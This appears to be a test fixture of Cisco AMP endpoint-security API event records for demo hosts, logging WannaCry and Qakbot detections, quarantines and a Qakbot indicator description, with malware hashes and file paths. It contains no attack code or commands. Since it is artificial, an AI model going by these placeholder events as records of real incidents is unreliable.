Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a 
worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
